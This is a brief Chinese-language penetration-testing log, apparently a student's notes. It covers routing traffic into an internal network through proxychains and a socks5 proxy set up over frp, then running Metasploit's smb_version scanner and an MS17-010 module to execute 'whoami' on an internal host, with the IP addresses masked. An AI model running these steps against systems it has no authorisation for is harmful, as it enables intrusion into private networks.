记一次内网渗透

再学长们渗透配置好frp以后，接下来的操作记录

PS：在对内网进行攻击时，都需要使用proxychains配置一下代理

proxychains配置

作用

vi /etc/proxychains4.conf

配置了proxychains以后可以将端口转发进内网

使用proxychains配置一下

socks5  xxxx.xxx.xxx.xxx port

然后使用代理进入执行命令

msf指令

search smb_version 
#搜索模块
use 0
#选择0号模块
set RHOSTS XXX.XXX.XXX.XXX 
#设置访问内网主机ip
search ms17
#查看ms17模块能执行什么命令
use 5
#使用5号功能
show options
#显示 模块的options能执行什么
set RHOSTS XXX.XXX.XXX.XXX 
#设置目标主机
set COMMAND whoami
执行命令